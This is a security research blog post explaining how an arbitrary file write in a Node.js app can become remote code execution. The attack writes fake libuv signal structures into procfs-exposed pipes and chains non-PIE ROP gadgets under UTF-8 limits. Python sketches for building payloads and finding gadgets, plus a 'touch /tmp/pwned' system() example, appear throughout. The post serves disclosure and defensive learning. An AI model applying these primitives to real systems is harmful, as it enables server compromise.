Infrastructure hardening makes applications more resilient to attacks. These measures raise the bar for attackers, making exploitation more difficult. However, they should not be seen as a silver bullet, as determined attackers can still leverage vulnerabilities in the source code.
In this blog post, we will highlight the importance of fundamental code security by showcasing a technique that attackers can use to turn a file write vulnerability in a Node.js application into remote code execution – even though the target’s file system is mounted read-only. The technique thwarts the restrictions applied in a hardened environment like this by leveraging exposed pipe file descriptors to gain code execution.
This blog post's content was also presented at Hexacon24. We will add a link to the recording as soon as it is available and let you know on X/Twitter and Mastodon.
File Write Vulnerabilities
During our mainly web-focused vulnerability research, we encounter a variety of vulnerability types, such as Cross-Site Scripting, SQL injection, Insecure Deserialization, Server-Side Request Forgery, and many more. The impact and ease of exploitation of these vulnerability types vary, but for a few of them, it is almost safe to assume that the whole application is compromised once that type of vulnerability is identified.
One of these critical vulnerability types is an Arbitrary File Write vulnerability. Attackers still need to figure out what to write where, but there are usually a lot of options to turn this into code execution and thus fully compromise the application’s server:
- Write a PHP, JSP, ASPX, or similar file to the web root.
- Overwrite a templating file that is processed by a server-side templating engine.
- Write to a configuration file (e.g., uWSGI .ini file or Jetty .xml file).
- Add a Python site-specific configuration hook.
- Use a generic approach by writing an SSH key, adding a cronjob, or overwriting a user’s .bashrc file.
These examples show that attackers usually find an easy way to turn an Arbitrary File Write vulnerability into code execution. To reduce the impact of such vulnerabilities, an application's underlying infrastructure is often hardened – making it more difficult but not impossible for attackers to exploit them.
File Writes in Hardened Environments
We recently encountered an Arbitrary File Write vulnerability in a Node.js application that turned out to be less easily exploitable. The vulnerability itself was more complex, but it boils down to the following vulnerable code snippet:
The function fs.writeFile is used to write a file, and both parameters – filename and content – are fully user-controllable. Thus, this is an Arbitrary File Write vulnerability.
When determining the impact of this vulnerability, we noticed that the user running the application has write permissions only for a specific upload folder. Everything else on the file system is read-only. Although this felt like a dead end for the exploitation of the vulnerability, it led us to the following research question:
Can an Arbitrary File Write vulnerability possibly be turned into code execution even though the target’s file system is mounted read-only?
Read-Only File Writes
On Unix-based systems like Linux, everything is a file. Besides traditional file systems like ext4, which store data on a physical disk, there are other file systems that serve a different purpose. One of these is the procfs virtual file system, which is usually mounted at /proc and acts as a window into the kernel's inner workings. Instead of storing actual files, procfs provides access to real-time information about running processes, system memory, hardware configuration, and more.
One particularly interesting piece of information procfs provides is the open file descriptors of a running process, which can be inspected via /proc/<pid>/fd/. The files opened by a process may not only be traditional files but also device files, sockets, and pipes. For example, the following command can be used to list the open file descriptors of the Node.js process:
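A comparable listing can also be produced programmatically. The following is a minimal Python sketch, assuming a Linux system with procfs mounted at /proc; the helper names `list_open_fds` and `anonymous_pipes` are hypothetical and only serve as illustration:

```python
import os

def list_open_fds(pid="self"):
    """Return {fd_number: link_target} for a process, read from /proc/<pid>/fd/."""
    fd_dir = f"/proc/{pid}/fd"
    result = {}
    for name in os.listdir(fd_dir):
        try:
            result[int(name)] = os.readlink(os.path.join(fd_dir, name))
        except OSError:
            # The descriptor was closed between listdir() and readlink().
            continue
    return result

def anonymous_pipes(fds):
    """Keep only descriptors whose link target looks like 'pipe:[<inode>]'."""
    return {fd: target for fd, target in fds.items() if target.startswith("pipe:[")}

if __name__ == "__main__":
    for fd, target in sorted(list_open_fds().items()):
        print(fd, "->", target)
```

Passing the PID of another process owned by the same user instead of "self" lists that process's descriptors in the same way.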
As we can see from the output above, this also includes anonymous pipes (e.g., pipe:[9173261]). Unlike named pipes, which are exposed as a named file on the file system, writing to anonymous pipes is usually impossible due to the lack of a reference. However, the procfs filesystem allows us to reference the pipe via its entry in /proc/<pid>/fd/. Unlike writes to many other files under procfs, this file write does not require root privileges and can be performed by the low-privileged user running the Node.js application:
Writing to a pipe is even possible if procfs is mounted read-only (e.g., in a Docker container) since pipes are handled by a separate filesystem called pipefs, which is internally used by the kernel.
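The effect can be reproduced in isolation. The sketch below is a hedged illustration, assuming Linux with procfs available: it creates an anonymous pipe, writes into it purely by path through /proc/self/fd/, and reads the data back from the read end. The function names are hypothetical.

```python
import os

def write_via_procfs(fd, data, pid="self"):
    """Open /proc/<pid>/fd/<fd> by path and write data into whatever it refers to."""
    path = f"/proc/{pid}/fd/{fd}"
    with open(path, "wb", buffering=0) as handle:
        return handle.write(data)

def demo():
    read_end, write_end = os.pipe()
    try:
        # Only a file path is needed here, which is all a file write primitive offers.
        write_via_procfs(write_end, b"hello pipe")
        return os.read(read_end, 64)
    finally:
        os.close(read_end)
        os.close(write_end)
```

The point of the demo is that the writer never receives the descriptor itself; knowing the path is enough.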
This unveils new attack surfaces for attackers who can write arbitrary files as they can feed data to the event handler that reads from an anonymous pipe.
Node.js and Pipes
Node.js is built on the V8 JavaScript engine, which is single-threaded. However, Node.js provides an asynchronous and non-blocking event loop. To do so, it uses a library called libuv. This library uses anonymous pipes to signal and handle events, which are exposed via procfs as we saw in the output above.
When a Node.js application is prone to a file write vulnerability, nothing prevents attackers from writing to these pipes, as they are writable by the same user running the application. But what happens with the data written to the pipes?
When auditing the related libuv source code, a handler named uv__signal_event caught our attention. It assumes that the data read from the pipe are messages of type uv__signal_msg_t:
The uv__signal_msg_t data structure only contains two members, a handle pointer and an integer called signum:
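To get a feeling for the memory layout of such a message, the two members can be mirrored with Python's ctypes module. This is only a sketch of the layout as described in the text (a pointer followed by an int); the class name `SignalMsg` is hypothetical and the printed sizes depend on the platform's ABI.

```python
import ctypes

class SignalMsg(ctypes.Structure):
    """Mirror of the two-member message layout described above."""
    _fields_ = [
        ("handle", ctypes.c_void_p),  # pointer to a uv_signal_s structure
        ("signum", ctypes.c_int),     # signal number
    ]

def layout():
    """Report size and member offsets as computed for the current platform."""
    return {
        "size": ctypes.sizeof(SignalMsg),
        "handle_offset": SignalMsg.handle.offset,
        "signum_offset": SignalMsg.signum.offset,
    }

if __name__ == "__main__":
    print(layout())
```

On a typical 64-bit Linux system, the structure occupies more bytes than the sum of its members because the compiler pads it to the pointer's alignment.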
The uv_signal_t type of the handle pointer is a typedef for the uv_signal_s data structure, which contains a particularly interesting member called signal_cb:
This signal_cb member is a function pointer that is supposed to contain the address of a callback function that is invoked later on in the event handler if the signum value of both data structures matches:
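The dispatch logic described here can be modeled in a few lines of Python. This is a simplified model and not libuv code: memory is represented by a dictionary that maps addresses to `FakeHandle` objects (a hypothetical stand-in for uv_signal_s), and the 16-byte message size assumes an x86-64 layout.

```python
import struct

MSG_FORMAT = "<QiI"                      # handle pointer, signum, 4 padding bytes (x86-64 assumption)
MSG_SIZE = struct.calcsize(MSG_FORMAT)   # 16 bytes

class FakeHandle:
    """Stand-in for the two uv_signal_s members that matter for dispatching."""
    def __init__(self, signum, signal_cb):
        self.signum = signum
        self.signal_cb = signal_cb

def dispatch(pipe_data, memory):
    """Walk over complete messages and invoke callbacks whose signum matches."""
    invoked = 0
    usable = len(pipe_data) - len(pipe_data) % MSG_SIZE
    for offset in range(0, usable, MSG_SIZE):
        handle_addr, signum, _padding = struct.unpack_from(MSG_FORMAT, pipe_data, offset)
        handle = memory[handle_addr]     # the handler trusts this pointer without validation
        if signum == handle.signum:
            handle.signal_cb(handle, signum)
            invoked += 1
    return invoked
```

In this model, whoever controls the bytes in `pipe_data` decides which address is treated as a handle and therefore which callback is invoked.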
The following image visualizes the data structure that the event handler expects:
This is a very promising situation for attackers: They can write any data to the pipe, and there is a quick path to the invocation of a function pointer. In fact, we were neither the first nor the only researchers to notice this. On August 8, HackerOne disclosed this great report from Seunghyun Lee, in which he describes a different scenario in which he was able to leverage the open file descriptor from within a Node.js program to bypass any module- and process-based permissions – basically a sandbox escape.
Even in the scenario he described here – which we didn’t have in mind – this is not considered a security vulnerability, and the report was closed as informative. That means that the technique we describe in the following sections still applies to the latest version of Node.js and this will probably not change in the near future.
Building Structures
The general strategy of attackers exploiting the event handler with a file write vulnerability may look like this:
- Write a fake uv_signal_s data structure to the pipe.
- Set the signal_cb function pointer to an arbitrary address that they would like to call.
- Write a fake uv__signal_msg_t data structure to the pipe.
- Set the handle pointer to the uv_signal_s data structure written before.
- Set the signum value for both data structures to the same value.
- Gain arbitrary code execution.
Assuming that attackers can only write files, all of this needs to be achieved with a one-shot write without the ability to read any memory beforehand.
The buffer of the event handler is quite large, which allows attackers to easily write both data structures to the pipe. However, there is a hurdle: the address of the data structures is unknown since all data written to the pipe is stored on the stack:
Thus, attackers wouldn't be able to make the handle pointer reference the fake uv_signal_s data structure. This leads to the question: Is there even any data that attackers could reference?
The addresses of the stack, the heap, and all libraries are randomized via ASLR. However, the segments of the Node.js binary itself are not. To our surprise, PIE (position-independent executable) is not enabled for the official Linux build of Node.js:
The reasons for this are apparently performance considerations, as the indirect addressing of PIE adds a small overhead. For attackers, this means that they could reference data in a Node.js segment since this address is known:
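Whether a given binary was built as a position-independent executable can be estimated from its ELF header: the e_type field is ET_EXEC for fixed-address executables and ET_DYN for PIE binaries (and shared objects). The following sketch reads that field; the function names are hypothetical, and the check is a heuristic rather than a full ELF parser.

```python
import struct

ET_EXEC = 2  # executable loaded at a fixed address (no PIE)
ET_DYN = 3   # shared object or position-independent executable

def elf_type(header):
    """Return the e_type field from the first 18 bytes of an ELF file."""
    if len(header) < 18 or header[:4] != b"\x7fELF":
        raise ValueError("not an ELF header")
    # EI_DATA (byte 5) selects the byte order: 1 = little-endian, 2 = big-endian.
    endian = "<" if header[5] == 1 else ">"
    (e_type,) = struct.unpack_from(endian + "H", header, 16)
    return e_type

def looks_like_pie(path):
    """Heuristic: ET_DYN means the image can be relocated, ET_EXEC means it cannot."""
    with open(path, "rb") as binary:
        return elf_type(binary.read(18)) == ET_DYN
```

Calling `looks_like_pie` on the path of a node binary would return False for a build without PIE; the path itself depends on the installation.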
The next question is: How could attackers store a fake uv_signal_s data structure in a Node.js segment? Searching for ways to make Node.js store attacker-controlled data at a static location (e.g., data read from an HTTP request) would be one approach, but this seemed to be quite challenging.
An easier approach is to just use what is already available. By examining the Node.js memory segments, attackers may be able to identify existing data that is suitable as a fake uv_signal_s structure.
The attackers’ dream data structure would look similar to this:
This data structure begins with a command string ("touch /tmp/pwned") followed by the address of system at the correct offset to overlap with the signal_cb function pointer. Attackers would only need to make the signum value match the fake uv_signal_s data structure so that the callback function is invoked, which effectively calls system("touch /tmp/pwned").
This approach requires the address of system to be present in a Node.js segment. The global offset table (GOT) would usually be a candidate for this. However, Node.js does not use the system function, so its address is not present in the GOT. And even if it were present, the beginning of the resulting fake uv_signal_s data structure would likely be another entry in the GOT and not a useful command string. Thus, another approach seems more viable: a classical ROP chain.
Searching Data Structure Gadgets
The beginning of every ROP chain is the search for useful ROP gadgets. A tool that searches for ROP gadgets usually parses the ELF file on disk and then determines all executable sections. The .text section is usually the biggest executable section since it stores the instructions of the program itself:
Now the tool iterates over the bytes in this section and looks for a ret instruction, for example, since this is a suitable last instruction for a ROP gadget. The tool then walks backwards from the byte that represents the ret instruction – byte by byte – to determine all possibly useful ROP gadgets:
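The backward walk can be sketched as follows. This is a simplified illustration that only collects raw byte windows ending in the x86-64 ret opcode (0xc3); real gadget finders additionally disassemble each window and discard invalid instruction sequences, which is omitted here. The function name and the `max_len` parameter are hypothetical.

```python
RET = 0xC3  # opcode of the x86-64 near return instruction

def gadget_candidates(code, base, max_len=4):
    """Yield (address, raw_bytes) for every byte window that ends in a ret."""
    for index, byte in enumerate(code):
        if byte != RET:
            continue
        # Walk backwards from the ret, one byte at a time.
        for back in range(0, max_len):
            start = index - back
            if start < 0:
                break
            yield base + start, code[start:index + 1]

if __name__ == "__main__":
    # 0x90 = nop, 0x5f = pop rdi, 0xc3 = ret
    for address, raw in gadget_candidates(bytes.fromhex("905fc3"), 0x1000):
        print(hex(address), raw.hex())
```

Each candidate would then be handed to a disassembler to decide whether it forms a meaningful instruction sequence.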
In this case, however, this is not what attackers need. Instead of a ROP gadget, they need an address that references a fake uv_signal_s data structure, which references a ROP gadget via its signal_cb function pointer. So, there is one indirection: the ROP gadget (address of a sequence of instructions) needs to be stored in the referenced data itself:
In order to identify suitable data structures like this, attackers need to search through the Node.js image similar to a classical ROP gadget finder tool. The difference, though, is that attackers are not only interested in executable sections like the .text section. The memory where the fake data structure resides does not have to be executable. Attackers need a pointer to a gadget. Thus, they can consider all segments that are at least readable. Also, this search can be done in-memory instead of only parsing the ELF file on disk. This way, attackers can also find data structures that were only created during runtime in the .bss section, for example. This may lead to false positives or environment-specific structures but increases their chance of getting useful findings, which can be verified manually.
A basic implementation of this in-memory search for fake data structures is actually pretty straightforward:
The Python script iterates over all Node.js memory regions and interprets 8 bytes at a time as a pointer, which it tries to dereference. If the address is mapped and references memory in an executable segment, it determines if the byte sequence stored at this address is a useful ROP gadget:
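The search idea can be sketched roughly as follows. This is not the original script but a hedged reconstruction of the description above: memory regions are passed in as snapshots (dictionaries with hypothetical keys `start`, `perms`, and `data`), the gadget check is delegated to a caller-supplied function, and the signal_cb offset of 0x60 is an assumption for x86-64 that should be verified against the targeted libuv build.

```python
import struct

SIGNAL_CB_OFFSET = 0x60  # assumed offset of signal_cb inside uv_signal_s (verify per build)

def find_region(regions, address):
    """Return the region snapshot that contains the address, or None if unmapped."""
    for region in regions:
        if region["start"] <= address < region["start"] + len(region["data"]):
            return region
    return None

def find_fake_handles(regions, is_useful_gadget, cb_offset=SIGNAL_CB_OFFSET):
    """Yield (fake_handle_base, gadget_address) pairs found in readable regions."""
    for region in regions:
        if "r" not in region["perms"]:
            continue
        data = region["data"]
        # Every byte offset is tried, since the fake structure need not be aligned.
        for offset in range(0, len(data) - 7):
            (pointer,) = struct.unpack_from("<Q", data, offset)
            target = find_region(regions, pointer)
            if target is None or "x" not in target["perms"]:
                continue
            code = target["data"][pointer - target["start"]:]
            if is_useful_gadget(code):
                # The pointer would act as signal_cb, so the handle starts cb_offset earlier.
                yield region["start"] + offset - cb_offset, pointer
```

The snapshots could, for example, be filled from /proc/<pid>/maps and /proc/<pid>/mem of a local Node.js process that matches the target's version.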
This is what the Python script looks like in action:
All potentially useful ROP gadgets are printed and can now be used as the initial ROP gadget that is executed when the callback function is invoked. Since all data written to the pipe is stored on the stack, it is sufficient to find a suitable pivoting gadget for this first gadget. Once attackers have pivoted the stack pointer to controlled data, a classical ROP chain can be used:
One caveat remains when using this technique to exploit an Arbitrary File Write vulnerability. Usually, the function used to write the file (fs.writeFile in this case) is limited to valid UTF-8 data. Accordingly, all data written to the pipe must be valid UTF-8.
Overcoming UTF-8 Restrictions
It is not challenging to find useful UTF-8-compatible gadgets for the classical ROP chain due to the huge size of the Node.js binary (~110M for the latest x64 build). However, this limitation further restricts the potentially suitable data structures for the fake uv_signal_s in the existing data. Based on this, an additional check needs to be added to the script to verify that the base address of the fake data structure is valid UTF-8:
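Such a check could look like the following sketch, which tests whether the little-endian 8-byte encoding of an address decodes as UTF-8. The function names are hypothetical; the check treats the pointer in isolation, which is reasonable here because it sits at the start of the message and its upper bytes are zero.

```python
import struct

def is_valid_utf8(data):
    """Return True if the byte string decodes as strict UTF-8."""
    try:
        data.decode("utf-8")
        return True
    except UnicodeDecodeError:
        return False

def pointer_is_utf8_safe(address):
    """Check the 8-byte little-endian form of an address, as it would appear in the payload."""
    return is_valid_utf8(struct.pack("<Q", address))
```

For example, `pointer_is_utf8_safe(0x4354c41)` holds because all non-zero bytes of that address are in the ASCII range, whereas an address containing a lone byte such as 0xf0 is rejected.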
Even with this additional check, the script still yields suitable fake data structures that reference a pivoting gadget like the following:
This is what the related data structure looks like in memory:
The base address of this fake data structure (0x4354c41) is valid UTF-8, so the handle pointer in the uv__signal_msg_t data structure can be correctly populated. However, there is another UTF-8-related problem, this time with the signum value:
The last byte of the signum value is 0xf0, which is not valid UTF-8 on its own. If an attacker tries to write this byte via the File Write vulnerability, it is replaced with a replacement character and the signum value check fails. If we enter 0xf0 in our UTF-8 visualizer, we can see that this byte introduces a 4-byte UTF-8 sequence:
Accordingly, a UTF-8 parser expects 3 continuation bytes following this byte. Since the uv__signal_msg_t data structure contains an 8-byte pointer and a 4-byte integer, the compiler adds 4 additional padding bytes to align the structure to 16 bytes. These bytes can be used to add 3 continuation bytes and thus craft a valid UTF-8 sequence:
The above floppy disc, for example, is a valid 4-byte UTF-8 sequence that begins with 0xf0. By adding these continuation bytes, attackers can fulfill the requirements of the whole payload being valid UTF-8 and make both signum values match:
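The padding trick can be illustrated with a short sketch that packs a 16-byte message and fills the padding so that the result stays valid UTF-8. The helper name `build_signal_msg` is hypothetical, and the layout (8-byte pointer, 4-byte integer, 4 padding bytes, little-endian) is the x86-64 layout described above.

```python
import struct

# The floppy disk emoji U+1F4BE encodes to f0 9f 92 be; drop the leading 0xf0.
FLOPPY_TAIL = "\U0001F4BE".encode("utf-8")[1:]

def build_signal_msg(handle_addr, signum):
    """Pack pointer and signum, then choose 4 padding bytes that keep the message valid UTF-8."""
    body = struct.pack("<QI", handle_addr, signum)
    if body[-1] == 0xF0:
        # Complete the 4-byte sequence started by 0xf0, then add one ASCII filler byte.
        padding = FLOPPY_TAIL + b"A"
    else:
        padding = b"AAAA"
    message = body + padding
    message.decode("utf-8")  # raises UnicodeDecodeError if the message could not be written as text
    return message
```

For instance, `build_signal_msg(0x4354c41, 0xF0414141)` yields a 16-byte message that survives a UTF-8 round trip unchanged. The signum value in this call is made up apart from its final 0xf0 byte, which is the only part taken from the example above.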
With this last hurdle out of the way, attackers are able to gain remote code execution.
The following video demonstrates the exploit against the vulnerable example application, which is running as a low-privileged user on a system with a read-only root file system and read-only procfs:
Learnings and Conclusion
The “Everything is a file” philosophy on Unix-based systems opens up uncommon attack surfaces when exploiting File Write vulnerabilities. In this blog post, we showcased this with a technique that can be used to turn a File Write vulnerability in a Node.js application into Remote Code Execution. Since the event handler code is from libuv, this technique can also be applied to other software that uses libuv, like Julia.
The generic approach is even applicable without Node.js and libuv. Whenever an application uses pipes as a communication mechanism, attackers may leverage a File Write vulnerability to target the pipe file descriptors exposed via procfs. As this example has shown, this might not be considered in a common threat model but can give remote attackers the ability to execute arbitrary code.
From a defensive perspective, this example highlights that infrastructure hardening can only be seen as an additional defense layer and cannot replace fundamental code security. Determined attackers can exploit vulnerabilities in the source code even though hardening measures have been employed. This clearly demonstrates why code security, as implied by Clean Code, is so important and why vulnerabilities should be fixed at their origin: the source code.